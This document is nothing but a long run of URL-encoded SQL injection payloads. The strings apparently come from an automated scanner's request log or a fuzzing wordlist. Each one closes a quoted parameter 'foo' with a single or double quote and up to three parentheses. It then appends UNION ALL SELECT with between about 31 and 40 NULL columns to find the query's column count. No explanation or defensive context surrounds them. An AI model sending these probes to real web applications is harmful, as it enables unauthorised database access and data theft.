foo%27%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 foo%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 